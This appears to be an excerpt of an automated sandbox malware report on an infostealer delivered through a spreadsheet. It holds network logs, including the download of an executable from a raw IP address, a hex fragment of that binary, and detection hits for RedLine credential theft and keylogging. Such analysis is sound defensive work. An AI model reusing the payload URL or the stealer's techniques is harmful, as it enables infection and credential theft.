                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
                  Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Thu, 02 May 2024 19:48:58 GMTAccept-Ranges: bytesETag: W/"57b5b9c5c99cda1:0"Server: Microsoft-IIS/8.5Date: Thu, 02 May 2024 15:39:45 GMTContent-Length: 1219072Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7d 61 33 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 ea 08 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 12 00 00 04 00 00 d4 4e 13 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 fc 2e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 12 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 fc 2e 05 00 00 40 0d 00 00 30 05 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 70 12 00 00 76 00 00 00 24 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: GET /ISW.exe HTTP/1.1Connection: Keep-AliveHost: 23.94.54.101
                  Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: api.ipify.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: api.ipify.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: api.ipify.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: api.ipify.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: api.ipify.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: api.ipify.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.94.54.101
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EBCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,3_2_00EBCE44
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ISW.exe HTTP/1.1Connection: Keep-AliveHost: 23.94.54.101
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                  Source: EQNEDT32.EXE, 00000002.00000002.444421814.000000000065F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.444421814.0000000000690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.54.101/ISW.exe
                  Source: RegSvcs.exe, 00000004.00000002.608494898.0000000002556000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: RegSvcs.exe, 00000004.00000002.608494898.0000000002441000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608494898.0000000002538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: RegSvcs.exe, 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: RegSvcs.exe, 00000004.00000002.608494898.0000000002538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipif8z
                  Source: RegSvcs.exe, 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608494898.0000000002441000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608494898.0000000002538000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608494898.00000000024FC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                  Source: RegSvcs.exe, 00000004.00000002.608494898.0000000002538000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608397603.00000000005B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                  Source: RegSvcs.exe, 00000004.00000002.608494898.0000000002538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/T
                  Source: RegSvcs.exe, 00000004.00000002.608494898.0000000002441000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608494898.0000000002538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
                  Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.22:49162 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, abAX9N.cs.Net Code: _7wfqbBU
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EBEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,3_2_00EBEAFF
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EBED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_00EBED6A
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EBEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,3_2_00EBEAFF
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EAAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,3_2_00EAAA57
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00ED9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,3_2_00ED9576

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.450ee8.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.450000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.450000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.a6ff36.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 3.2.CKK.exe.140000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.a6f04e.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.3446458.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.4c0000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.3497170.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.a6f04e.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.450ee8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.3497170.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.3446458.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.a6ff36.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000004.00000002.608358959.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000003.00000002.447488825.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Binary is likely a compiled AutoIt script file
                  Source: CKK.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: CKK.exe, 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f4a7f36d-1
